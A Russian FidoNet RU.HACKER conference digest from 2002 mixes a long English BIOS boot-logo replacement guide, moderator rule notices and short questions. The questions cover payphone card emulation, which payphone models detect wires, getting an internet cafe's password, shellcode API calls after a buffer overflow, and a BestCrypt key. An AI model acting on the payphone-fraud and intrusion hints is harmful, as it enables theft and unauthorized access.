00:29:19 2:5038/13.29 To : Dmitry Timoshenko 2:5030/1266.11 Subj : вечная телефонная каpта =====================================================================RU.HACKER= Hi, Dmitry! Понедельник Март 18 2002 03:58, Dmitry Timoshenko wrote to Arthur Ivanov: DT> Если ты вытаскивал чип из пластика, то навеpное заметил, DT> что на дpугой стоpоне он заляпан смолой, люди говоpят, DT> пpедохpоняющей его как pаз от всякого pода излучений. Да любая смола поглотит ультрафиолет, а вот рентген - нет. Какие всякого рода излучения ты имел ввиду ? DT> Я думаю, может быть легче обмануть таксофон. DT> Hе делая эмулятоp, а в нужный момент, когда он будет чиать данные с DT> каpты, сунуть ему что надо, х$й знает, может пpойдёт. Иногда делаются эмуляторы, содержащие чип от настоящей карты. Однокристалочка подменяет часть данных читаемых с этого чипа. Это один из подходов. DT> Вопpос: ты писал, что в таксофонах установлен детектоp на наличие DT> пpоводов идущих наpужу, это точно? Hа твой вопрос в такой формулировке ответить просто нельзя. Посмотри на возможный спектр ответов : 1 У таксофонов ТМГС-15280 детектор есть и очень крут. Обнаруживает даже одиночный провод длиной в пару сантиметров. 2 У таксофонов ТМС-1517 такой детектор тоже есть, да вот толку с него никакого. 3 У таксофонов GNT-807 (Санкт-Петербургские Таксофоны) и у АЖТ-69КМ никакого детектора нет. 4 Про другие типы таксофонов - не знаю. Arthur Ivanov --- * Origin: - это чушь (2:5038/13.29) = Здесь обитают хакеры ====================================================New= Msg : 2300 [1-10330] From : Moderator of RU.HACKER 24-Mar-02 00:06:33 2:5042/11.1 To : All Subj : Warning =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 2301 [1-10330] From : Dmitriy Shevchuk 23-Mar-02 17:48:22 2:4624/8.161 To : All Subj : узнать пароль =====================================================================RU.HACKER= ╔══════════════════════════Hello All!════════════──────-──--─ Пиплzzzz, как можно сабж осуществить? Дома итэрнэта нету, я хожу в и-нэт кафе. Они дозвонщиком VDialer 3.x пользуються, операцыонка - Bedos, очень на винду смахивает, отличаеться только шараварностью, (просто у нас были проверки и два клуба из-за винды нелицензионной закрыли :((( ). Я знаю номер провайдэра, имя их пользователя и пароль (он 8 символов). Help, people, help!!! ╚════════════════════════════Всего наилучшего!═══════=══════────-──-- Dmitriy --- GoldED/W32 3.00.Beta4+ * Origin: ./░▒▓I want to visit Zimbvabve !▓▒░\. (2:4624/8.161) = Здесь обитают хакеры ====================================================New= Msg : 2302 [1-10330] From : Moderator of RU.HACKER 24-Mar-02 03:14:02 2:5042/11 To : Dmitriy Shevchuk 2:4624/8.161 Subj : Re: узнать пароль =====================================================================RU.HACKER= Мое почтение, Dmitriy! Давеча, 23 Мар 02, от Dmitriy Shevchuk для All было сообщение: DS> Пиплzzzz, как можно сабж осуществить? DS> Дома итэрнэта нету, я хожу в и-нэт кафе. DS> Они дозвонщиком VDialer 3.x пользуються, DS> операцыонка - Bedos, очень на винду смахивает, отличаеться только DS> шараварностью, (просто у нас были проверки и два клуба из-за винды DS> нелицензионной закрыли :((( ). DS> Я знаю номер провайдэра, имя их пользователя и пароль (он 8 символов). А теперь быстро сам перевари, что ты сказал, иначе... C уважением к Вам, Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2303 [1-10330] From : Alexandr Yutkin 23-Mar-02 14:53:54 2:6090/1.15 To : Anton Penzin 2:5079/39.12 Subj : logo in the BIOS =====================================================================RU.HACKER= [√] Привет, как жизнь, Anton ? 20 Марта 2002 года ты писал(а) к All: AP> Кто-нибуть знает как можно поменять картинку в БИОСе. Поясняю: когда AP> включаете комп, то обычно справа вверху появляется картинка AP> изготовителя или название фирмы у которой брал комп. Подскажите, как AP> ее можно поменять. Заранее огромное спасибо. Есть проги специальные - в инете достаёшь прогу для прошивки и специальное приложение для твоего Биоса - то что будешь прошивать. Для каждого Биоса своё. Дак вот то что туда будешь зашивать там будет и картинка, которая редактируется хоть паинтом, но будь осторожен, а то не то прошьёшь и потом пойдёшь покупать новый Биос. У меня друг один прошивал и не в то время перезагрузился... ; [√] Пока, Anton, счастливого тебе коннекта ! ... --- GoldED+/W32 1.1.4.5, FastFTN v1.55 * Origin: This virus requires Microsoft Windows (2:6090/1.15) = Здесь обитают хакеры ====================================================New= Msg : 2304 [1-10330] From : Moderator of RU.HACKER 24-Mar-02 05:35:47 2:5042/11 To : Alexandr Yutkin 2:6090/1.15 Subj : Re: logo in the BIOS =====================================================================RU.HACKER= AY> Есть проги специальные - в инете достаёшь прогу для прошивки и AY> специальное приложение для твоего Биоса - то что будешь прошивать. Для AY> каждого Биоса своё. Дак вот то что туда будешь зашивать там будет и AY> картинка, которая редактируется хоть паинтом, но будь осторожен, а то не AY> то прошьёшь и потом пойдёшь покупать новый Биос. У меня друг один прошивал AY> и не в то время перезагрузился... ;) За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Alexandr Yutkin, 2:6090/1.15, 24 Мар 02, [!], 1 1. личная переписка. Moderator of RU.HACKER. ___ /*Great Parsekoids*/ _Team_ Coordinator --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2305 [1-10330] From : Vladislav Terehov 24-Mar-02 00:16:51 2:5030/1307.25 To : Dmitriy Shevchuk 2:4624/8.161 Subj : узнать паpоль =====================================================================RU.HACKER= Пpивет, Dmitriy. Помниться, 23.03.02 Dmitriy Shevchuk писал[а] к All: DS> Я знаю номеp пpовайдэpа, имя их пользователя и паpоль (он 8 символов). ^^^ ^^^^^^ А чего тебе ещё надо?! ---- Пишите письма --- FTNed 2001 Build 0054-RC3/Win98 * Origin: FTNed - The Best GUI FTNeditor! http://ftned.da.ru (2:5030/1307.25) = Здесь обитают хакеры ====================================================New= Msg : 2306 [1-10330] From : Moderator of RU.HACKER 24-Mar-02 07:59:07 2:5042/11 To : All Subj : !!! =====================================================================RU.HACKER= Мое почтение, All! Господа, мне уже поступило 7 заявок с просьбой _ужесточить_ модерирование! Отныне все темы, _явно_ не вписывающиеся в топик, будут караться по принципу "непрочтение рулесов перед постингом". C уважением к Вам, Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.nm.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2307 [1-10330] From : Moderator of RU.HACKER 24-Mar-02 09:10:44 2:5042/11 To : Vladislav Terehov 2:5030/1307.25 Subj : Re: узнать паpоль =====================================================================RU.HACKER= DS>> Я знаю номеp пpовайдэpа, имя их пользователя и паpоль (он 8 символов). VT> ^^^ ^^^^^^ VT> А чего тебе ещё надо?! За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Vladislav Terehov, 2:5030/1307.25, 24 Мар 02, [!], 1 1. личная переписка. Moderator of RU.HACKER. ___ _Амурский реабилитационный астма-центр_ --- WebSite: /*kiosi.amur.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2308 [1-10330] From : Ivan Mashchenko 19-Mar-02 23:15:50 2:5030/1152.20 To : All Subj : FireWall =====================================================================RU.HACKER= [ /GrayFog at DEep Shadow system (2:5030/ /1152.20@fidonet)/ ] Добpой ночи тебе, All ! Пожалyйста посоветyйте пpофессиональный, мощный, жyтко фyнкциональный, надежный и эффективный, обеспечивающи пpедельнyю закpытость защищаемой системы и больно стyчащий по лбy и отпpавляющий к конкpетной матеpи _всех_ (в том числе системные фyнкции и IE) комy я лично не pазpешил лезть в инет, позволяющий пpи общем pазpешении пpоге запpетить стyчание на опpеделенные адpеса/поpты, позволяющий блокиpовать скачкy pекламы (по шаблонам URL'ов и ALT'ов и NAME'ов), делающий Stealth mode, позволяющий самым наглым обpазом сниффить все что yходит от меня, пpиходит ко мне и пpоходит чеpез меня и конкpетно pаботать с этим пpоходящим/входящим/yходящим тpаффиком. Мне надо ни какyю-нибyдь игpовyю пpиставкy к монитоpy защитить, а конкpетнyю-конкpетнyю-секpетнyю и свеpх важнyю тачкy (пpичем защитить как от атак из вне, так и от "стyчалок" и пpочих пpогpамм-агентов изнyтpи) (менять на этой почве ось не пpедлагайте - скоpо так и сделаю, а пока надо защитить Windows). Фильтpы баннеpов типа AtGuard и фyнкциональные но чахлые subj'и типа Outpost не пpедлагать ! Качественные но User-chainik-оpиентиpованные малофyнкциональные типа Norton (Personal) Firewall тоже не советyйте.В общем посоветyйте что-нибyдь _*действительно сеpьезное !!*_ Умоляю помогите Заpанее огpомное спасибо ... К ответам большая пpосьба по возможности пpилагать ссылки. Есле кто из 2:5030 сможет мне такое (если оно большое и не качабельное) пеpедать лично, я от счастия напою его пивом PS: Так как когда-нибyдь бyдет сменена ОС - для QNX, Linux, BSD тоже чего-нибyдь пpисоветyйте аналогично Пyсть только лyна освещает твой пyть, All .... Ivan"GrayFog"Mashchenko ============================================================================== ... Staying alive just to see yet another moonrise ... --- GoldED/386 3.00.Beta5+ [WinNT 5.0.2195:SP2 Enterprise (W2KAS) Pan.Euro.] * Origin: < Who wants to live forever... > DEep Shadow system (2:5030/1152.20) = Здесь обитают хакеры ====================================================New= Msg : 2309 [1-10330] From : Alexey Sapach 23-Mar-02 23:42:00 2:5030/1304.21 To : All Subj : MAC адрес в IRC =====================================================================RU.HACKER= Здорова, All! Помогите пожалуйста организовать фильтрацию клиентов по MAC адресу, для IRC сервера. Т.е. необходимо чтобы определялся MAC каждого, кто коннектиться, и сверялся с маской адресов, разрешённых на сервере. Какие будут идеи? ЗЫЖ И ещё, хотелось бы получить комментарий о физическом происхождении этого адреса, что это вообще такое? Вот собственно и всё. Прощальность... Alexey ... Сижy в тишине, ничего yшки не pадyет ... --- * Origin: Что с возрастом упало - то пропало. (2:5030/1304.21) = Здесь обитают хакеры ====================================================New= Msg : 2310 [1-10330] From : Borisov Gleb 23-Mar-02 09:40:42 2:5030/1124.14 To : Ilya V. Vasilyev 2:5020/287 Subj : HCD #1: call for beta testers. =====================================================================RU.HACKER= Пpивет Ilya! 14 Маp 02 16:53, Я тyт заметил что Ilya V. Vasilyev писал Anton Tovkach и pешил ответить IV> послyжить бета-тестеpом, тот может помочь в создании HCD #1. Hа IV> чайниках экспеpименты тоже пpовожy. :-) a mojno mne ego v SPb pochtoi? ya za pochtovie uslugi i bolvanki mogo zaplatit' esli mojno to v MetMAIL Borisov --- CHAINIK v.3.2 * Origin: << Hапомните мне его сделать >> (2:5030/1124.14) = Здесь обитают хакеры ====================================================New= Msg : 2311 [1-10330] From : Igor Kuznetsov 25-Feb-02 01:09:18 2:6037/18.23 To : All Subj : BestCrypt =====================================================================RU.HACKER= Привет, All! Есть ли универсальный ключ к сабжу? Conrol panel 6.07.02 Draiver 2.41 Igor --- * Origin: И ненадо лохматить бабушку !(она и так лохматая.) (2:6037/18.23) = Здесь обитают хакеры ====================================================New= Msg : 2312 [1-10330] From : Moderator of RU.HACKER 25-Mar-02 07:59:24 2:5042/11 To : Borisov Gleb 2:5030/1124.14 Subj : Re: HCD #1: call for beta testers. =====================================================================RU.HACKER= BG> a mojno mne ego v SPb pochtoi? ya za pochtovie uslugi i bolvanki mogo BG> zaplatit' esli mojno to v MetMAIL За невыполнение правил конференции выставляется модераториал: (Name; address; date; moderatorial; duration, month) Borisov Gleb, 2:5030/1124.14, 25 Мар 02, [!], 3 1. непрофессионализм. 2. личная переписка в эхе 3. непрочтение правил эхи. Moderator of RU.HACKER. ___ _/*Ex-Teamer Russian Team U.S.Robotics*/_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ _Team_ /*Great Parsekoids*/ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 2313 [1-10330] From : Andrey Sergeew 24-Mar-02 13:59:53 2:5020/996.777 To : All Subj : эээх, не знаю в топик-ли =====================================================================RU.HACKER= Hi there, All! После переполнения буфера переходит управление на мой код, но вот возник вопрос - как из него вызывать апихи? сканить ядро? делать табличку адресов для разных виндов?.. вроде все делается как-то проще p.s. разыскивается исходник redcode'а... был, да потерся... Virtually yourz, Svg7 --- free(your->mind)... powered by freebsd and 220v * Origin: so stay connected, expect the unexpected (c) Dog ea (2:5020/996.777) = Здесь обитают хакеры ====================================================New= Msg : 2314 [1-10330] From : Alex Malashonok 23-Mar-02 07:45:20 2:4635/83.64 To : Anton Penzin 2:5079/39.12 Subj : logo in the BIOS =====================================================================RU.HACKER= Привет Anton! Среда Март 20 2002 20:58, Anton Penzin -> All: AP> Кто-нибуть знает как можно поменять картинку в БИОСе. Поясняю: когда AP> включаете комп, то обычно справа вверху появляется картинка изготовителя AP> или название фирмы у которой брал комп. Подскажите, как ее можно поменять. AP> Заранее огромное спасибо. Точно не знаю, но если хочешь, могу выслать сырки по перешивке биоса (на ПАС) - с условием: разбирайся с ними сам :) - писал не я. Программа работает, лично наблюдал. Единственное, с чем тебе прийдется разобраться - с форматом ИМИДЖЕЙ :))) - они толи пакованые, толи твои битмапы в них пакованые. Впринципе могу спросить Alex --- Советую стереть эту строку... * Origin: Допиши свой ориджин :) (2:4635/83.64) = Здесь обитают хакеры ====================================================New= Msg : 2315 [1-10330] From : Valeriy Brudanin 25-Mar-02 09:20:29 2:5025/2.60 To : Anton Penzin 2:4635/83.64 Subj : logo in the BIOS =====================================================================RU.HACKER= Пpиветствyю тебя, Anton! Кажется 23 Mar 02, Alex Malashonok писал Anton Penzin: AM> @RealName Александр Малашонок AM> Привет Anton! AM> Среда Март 20 2002 20:58, Anton Penzin -> All: AP>> Кто-нибуть знает как можно поменять картинку в БИОСе. Поясняю: AP>> когда включаете комп, то обычно справа вверху появляется картинка AP>> изготовителя или название фирмы у которой брал комп. Подскажите, AP>> как ее можно поменять. Заранее огромное спасибо. AM> Точно не знаю, но если хочешь, могу выслать сырки по перешивке биоса AM> (на ПАС) - с условием: разбирайся с ними сам :) - писал не я. AM> Программа работает, лично наблюдал. Единственное, с чем тебе прийдется AM> разобраться - с форматом ИМИДЖЕЙ :))) - они толи пакованые, толи твои AM> битмапы в них пакованые. Впринципе могу спросить. Есть дока в фоpмате ХТМ где всё pасписано, пpавда стаpенькая 1999год, там же ссылки откуда можно утащить всё необходимое занимает 6.5Kb в аpхиве... Valeriy Hаписано 25 Mar 02 в 09:20. ... Hoвoе слово в кoннoй авиации. --- GoldED+/W32 1.1.5-20020105 + pазные пpибамбасы * Origin: Вы используете незаpегистpиpованную веpсию мозгов! (2:5025/2.60) = Здесь обитают хакеры ====================================================New= Msg : 2316 [1-10330] From : CoModerator 25-Mar-02 08:20:09 2:5072/7.11 To : All Subj : Rules =====================================================================RU.HACKER= _КАТЕГОРИЧЕСКИ ЗАПРЕЩАЕТСЯ ПУБЛИКАЦИЯ ЛЮБЫХ СООБЩЕHИЙ_ _В КОHФЕРЕHЦИЮ RU.HACKER ДО ОЗHАКОМЛЕHИЯ С ПРАВИЛАМИ (RULES)_! > Тематика конфеpенции. Постмодеpиpyемая конфеpенция RU.HACKER посвящена обсyждению на пpофессио- нальном ypовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсyждения вопpосов, имеющих специализиpованнyю напpавленность, pекомендyется обpащаться в конфеpенции FIDONet, имеющих соответствyющyю тематикy. В слyчае отсyтствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности полyчать эти эхи, под- писчик RU.HACKER должен yказать это в своем письме. > Работа конфеpенции. Изначально подpазyмевается, что любой yчастник, пyбликyющий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсyждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение yказанных yсловий является наpyшением пpавил конфеpенции, и наказывается [!] без всяких пpедyпpеждений! Если Вы не yвеpены в том, что Ваше письмо соответствyет тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpy пpежде, чем помещать его в эхy. --- * Origin: Молоток - лyчший дpyг компьютеpа (2:5072/7.11) = Здесь обитают хакеры ====================================================New= Msg : 2317 [1-10330] From : Drone 24-Mar-02 08:20:00 2:5020/1990.111 To : Anton Penzin 2:5079/39.12 Subj : Re: logo in the BIOS =====================================================================RU.HACKER= ░▒▓█ Приветствую! ▓ 20 Mar 02 в 20:58 Anton Penzin писал(а) к All на тему logo in the BIOS: AP> Кто-нибуть знает как можно поменять картинку в БИОСе. Поясняю: когда AP> включаете комп, то обычно справа вверху появляется картинка AP> изготовителя AP> или название фирмы у которой брал комп. Подскажите, как ее можно поменять. AP> Заранее огромное спасибо. Вот статейка. Сегодня на институтском компе заменил лого на свое... Вот уж админы посмеются.. -----===== Cut =====----- Changing the EPA logo in Award BIOS - updated guide Disclaimer: The information I present here is intended for power users - and any attempt to follow it is your own responsibility In no way will I be held responsible for what may happen if anyone attempts to do something even vaguely relating to what I tell about. I will merely just tell what *I* have done,my results,my comments and notes and what I think might be possible if my attempts are done by someone else following these guidelines I strongly suggest that anyone who wants to do this customization also searches for more sites with information I might have missed - but you will still be on your own if you attempt to do it The dangerous thing is not modifying the logo as such, but rather the usual dangers of flashing your BIOS. A bad logo will either simply not show up at all,or it might be distorted. The real danger is if anything goes wrong during the flash - a corrupted file,wrong BIOS version,power outtage or similar I have done it successfully on 8 of my computers so far, with these motherboards Asus TX97-E, Asus P5A, EPoX MVP3G-M, EPoX MVP3G2, Gigabyte 7IX, Abit KA-7, Abit KT7A-RAID and EPoX 8KTA3+, so I know that it works on those Disclaimer II:(IANAL,but it'll hopefully cover my butt from lawsuits) If Award/Phoenix,who are the manufacturer of the BIOS and several of the programs described here (or other companies mentioned here) deems anything to be in violation of copyrights belonging to them, then contact me at dthought@yahoo.com so I can remove any offending material Introduction: It is a little-known fact that it is possible to change the EPA logo shown during POST in most modern Award BIOS versions. Some motherboard makers do this with the standard BIOS they have bought, to include their own logo, but doing it yourself is not supported by neither motherboard manufacturers nor Award Software Also,the utilities for modifying the bios are not downloadable from them, but a thorough search of the Internet will locate the necessary files - apparantly some nice guy/girl has leaked them Unless I get problems because of doing so, I will naturally also provide links for the files needed There are many reasons for doing this customization yourself. What seems to be the most common reason is to really get a customized computer - after all, changing the background and the sounds that plays while you wait for Windows to crash does become a bit boring, and you'll probably find your preferred settings pretty quickly. Also, it's something new to try for the hardcore tweakers when you've custompainted your custom-made case,installed 5 fans,a digital temperature monitor and two neon lights,overclocked everything but the floppydrive and you're out of new customization ideas The most common ideas for a new logo I've seen are either small Tux images (Tux is the Linux penguin mascot, dummy), or images that brags about one's Pentium II/III/Celeron CPU(of course,if the image was depicting an Athlon or K6 it would not be bragging but simply a show of one's pride and intelligence :)) Finally,a very sensible but quite boring thing could be to simply put your name and address in the logo Background: The EPA logo that is shown when you boot your computer is a special type of image known as an .EPA-file. It is not in a format that any common programs can handle. Actually,it appears that there are two different ways of encoding this images - I will refer to the most common standard as " EPA", whereas the other one will be called "AWBM" - but more on this later. Changing this logo requires you to either make a copy of your current BIOS and then modify it, or preferably to go to homepage of the manufacturer of your motherboard and get the newest version there. If you don't know how to flash your BIOS,or even what motherboard you have,then I'd really suggest you back off now - flashing the BIOS *can* destroy your motherboard if anything goes wrong,as stated above There are very strict limits for how big these images can be, how the layout can be, how many colors you can use and so on - so you can forget putting in a 32 bit color full-size logo showing Pamela Anderson's boobs (Full-size would probably also require having a 24" monitor,anyway :P Well,to be exact,some motherboards/BIOS's does support large fullscreen boot logo images - 640x464x16 colors - but the only one I've yet tested it on, my DT5 (Epox MVP3G-2),didn't,so I haven't messed with it. A full screen logo would also be a bit overkill,anyway - personally I prefer a little subtle logo while I still get to see all the POST messages.A friend's QDI board had a full-screen bootup logo, and it was really annoying not to see the familiar POST messages - or perhaps it's just me.. Anyone who wants to know more should look at http://velociraptor.mni.fh-giessen.de/Bootlogo/ It's in German,though,so good luck trying to read it; Now,the actual instructions,finally: Start by getting the newest BIOS from your motherboard manufacturer,and the flash program and version they recommend for this particular BIOS and motherboard.(Or use your flash program to make a copy of your current BIOS. I'll use my 7IX version 4A as an example,with the filename 7IX.F4A Binary BIOS files are apparantly compressed files,using a variant of LZH encoding to include various parts. To modify this file you'll need the "leaked" program called CBROM.EXE You can display the contents of your BIOS file by typing CBROM biosfilename.ext /D (In my case : CBROM6 7IX.F4A /D) From this BIOS file,you need to extract the original EPA logo,by typing: CBROM biosfilename.ext /EPA extract (In my case : CBROM6 7IX.F4A /EPA extract) and then enter the name you want to give the extracted file when prompted - or just hit enter to use the original name The name of this "EPA-logo" file was AwardBmp.bmp - and this hints that this bios is using the "EPA version 2" image type,called AWBM - supposedly meaning AWard BitMap.Disregard the .BMP extension,it means nothing When the "old" EPA format is used,the extension is usually .EPA instead of .BMP,but this is not a golden rule As said earlier,these EPA/AWBM images are in special format that cannot be opened with regular graphics apps. Fortunately,"Linkit Productions", http://linkIt.Euro.Ru/ has "hacked" this EPA/AWBM format and released some shareware products that can read and convert it. To make sure what type of image it is,download their "AWBMREAD" program(a DOS program,works fine in Windows console) and load up the extracted EPA logo - it will then tell you its characteristics and display the logo.Rename it to .EPA first if needed,though - the AWBM reader (stupidly) won't accept a .BMP extension.. Simply type: RENAME awardbmp.bmp awardbmp.epa AWBMREAD awardbmp.epa and hit "enter" a few times to go through the steps,noting what kind of EPA logo it is,and the size of it Making a new logo: The version 1 "EPA" format is very restrictive. The logo can only be 136x126 or 136x84 - this seems to depend on the BIOS,so the safest way to go on is to make your new logo the same size as the original logo Also,the EPA version 1 logo is displayed on a "text mode" screen (the screen is in textmode when booting your PC)- so the logo can only have one color (apart from the background black) in each "character cell",8 pixels wide,14 high - and you only have a 16 color palette to work with(15 colors and black background). It *might* be possible to change the black background color,but I have not tested this - and I'd expect very weird colors to show up Furthermore I've read (but I haven't been able to verify this), a maximum of 905 pixels can be coloured. As far as I can understand the AWBM specs(from Linkit Productions), the only image size limit for the version 2 AWBM-type logo is how much free space there is in the BIOS file.However, it is very possible that an image which size differs from the original will be misplaced or distorted when shown, so using the original size is advisable The version 2 AWBM logos should support all 16 colors in the palette in each character cell,and not just 1 color plus background per cell Your next step depends on whether you have a BIOS with a version 1 or version 2 logo - unfortunately it does not seem like you can use a version 1 logo in a version 2 BIOS or vice versa. Also, the Award BIOS mainly exist in versions 4.50, 4.51 and 4.60 - and there doesn't seem to be any connection between which can handle version 1 or version 2 logos Creating a new logo - EPA version 1: If you have the version 1 logo,load up a new image in Paint Shop Pro like this:(136x126 or 136x84),4 bit color,black background,white foreground color To figure out where the "character cells" are,and therefore the limits for color changes,use a "grid" File->Preferences->General Program Preferences : tab "Rulers and Units" Activate the grid under "View->Grid" or hit CTRL-ALT-G Now get creative and make a logo that looks useable despite the limitations. An example,making the logo using the grid to help: However, you must be aware that you cannot go on with this colored logo - you need another program to fill out the cells with colors. Also,you cannot choose the colors yourself The available colors are: Download a Paint Shop Pro palette file here So this is strictly for experimenting until you've found something that looks cool to you When this is done,you need to copy/convert the result into a black and white bitmap for further processing and save it as a standard Windows bitmap file(remember to decrease the color depth to 1 bit/2 colors first) Load it up again,this time with Award's BMP2EPA.EXE (DOS,works fine in Windows console) program BMP2EPA logoname.BMP logoname.EPA and then colorize it: BMP2EPA.EXE is fairly straightforward to use - load up the bitmap,click the color you want to fill in the cells(the palette in the lower left corner),click the cells to fill with color,and finally save the image Note however,that if you cancel your artwork instead of saving and exiting "nicely",the program seems to have a tendency to mess up the files - so please exit properly There is also a shareware Windows program (BMPtoEPA) from http://www.flazh.de to create EPA's and colorize bitmaps - but when unregistrered it will add a Watermark to the .EPA,and personally I don't want to spend 10 $ on a "nicer" Windows program when I have a fully working DOS program that does the same thing Creating a new logo - EPA version 2: If you have a version 2 (AWBM) logo,you can just go ahead and make your logo with the desired colors in Paint Shop Pro like above - (FILE->NEW, 136x126 or 136x84 to be safe,16 colors,black background),and save the coloured logo as a standard Windows bitmap file.Then get the AWBMMAKE program from Linkit Productions,and convert your bitmap to an AWBM-file Pretty easy,simply type: AWBMMAKE logoname.bmp and hit Return a couple of times to go through the steps. Be sure to read their instructions,though - it seems like Asus and QDI boards requires special attention Important update: Unfortunately it seems like Linkit's website has died, however, some very bright programmers named Sergey Nikolayev and Artur Prokopiuk have created EPACoder, a FREE WIN32 program that can do everything the Linkit-programs could, but even better, and using a GUI so you don't have to mess with command line parameters anymore. As seen in the screenshot, it can convert from EPA to BMP and back, and also between version 1 and version 2 logos, so now you just need to create the bitmap-image in an editor and this brillant program handles all the conversions You still need to use CBROM to add the EPA to the BIOS file, though. At last,when you've made your logo and converted it to EPA/AWBM format,comes the time to flash the BIOS First,however,you need to get the logo into the BIOS file - which is again achieved using the CBROM.EXE program CBROM biosfilename.ext /EPA logoname.ext (In my case : CBROM6 7IX.F4A /EPA dt616.epa Make sure to read any error messages and do NOT attempt to flash if anything seems wrong Further customization - and a possible safeguard before flashing: Another tool exists that can be used for really low-level messing with (or messing up :P) the BIOS,namely a program called Modbin. I have no idea how to properly use it for its intended purpose,which seems to be adjusting bit-level timing and which settings you can adjust in the BIOS,but I can see that it can be used to change the message showing the BIOS version and date,which is also cool.I just use it to to change the BIOS ID string to show the name of that particular PC What makes it more interesting is that it seems like if you load up your BIOS file with Modbin after adding your new logo,it will do a check of the data integrity of the file - at least,it cannot hurt to try Time to flash: After you've said a few prayers, backed up all data, bought a new motherboard in case anything goes wrong(for "hotflashing"...),and mentally prepared by studying Zen Buddhism or similar for a few years you can now flash your BIOS Precautions: Make a few bootable floppies with a known well-working BIOS and flash program on,and store them safely somewhere - while hoping that your PC can actually boot from floppy if anything goes wrong Also find a guide to "recovery after a bad flash" and print it - a good place to start would be Wim's Bios Page I can also highly recommend the RD1 BIOS Savior! from IOSS/Vicstech - it can be a real (motherboard)-lifesaver in case anything goes wrong - or in the future if you get hit by a CIH-like virus, it can save your behind It is usually recommended that you boot from a (bootable) floppy containing just the flash program and the bios - with no memory manager or anything loaded that might interfere with the flash.However,I personally don't trust the data "integrity" on floppies so I prefer to boot from HD - in safe mode,command prompt and flash from that instead Be aware that various settings in the BIOS setup can interfere with the flash - usually those are "Shadow BIOS" and system/memory caching, so mess around with these settings in case the flash program complains.Also make sure that you do not load any memory managers,CD-ROM drivers,mouse drivers or anything(PURE DOS!) - the flash program will get very upset Read any instructions your motherboard supplier might have for how to flash your bios, and when ready, load the flash program and go flash In order to FORCE any readers of this to actually read the flash instructions from your motherboard manufacturer I will not link to any flash programs ; After a -hopefully- successfull flash,hit F1 as the flash program recommends,for a hard reset - or simply hit the reset button When the computer -hopefully- boots showing your great new logo,hit delete to enter BIOS/CMOS setup and load defaults if you're also upgrading the bios version - or if your new bios version is similar to the current simply exit while saving If the logo does NOT show up,or the colors/layout are wrong,it's time to figure out what went wrong - but this "only" seems to occur if you've messed with the palette, are using a strange image size,or try to use an EPA format logo in an AWBM-BIOS or vice versa,so start by using the exact same settings as in the original logo I have a hunch that a BIOS can handle at least 1000 reflashes,so you should have ample time to experiment I hope this long-winded blabber can prove interesting for someone. /DT -----===== Cut =====----- ░▒▓█ С уважением, Андрей Ковалев █▓▒░ Я люблю людей,люблю когда их нет.Я бы вышел на балкон и разрядил бы пистолет... --- [Mo.Nashe.Radio] [Mo.Mesi] [http://drone.nm.ru] 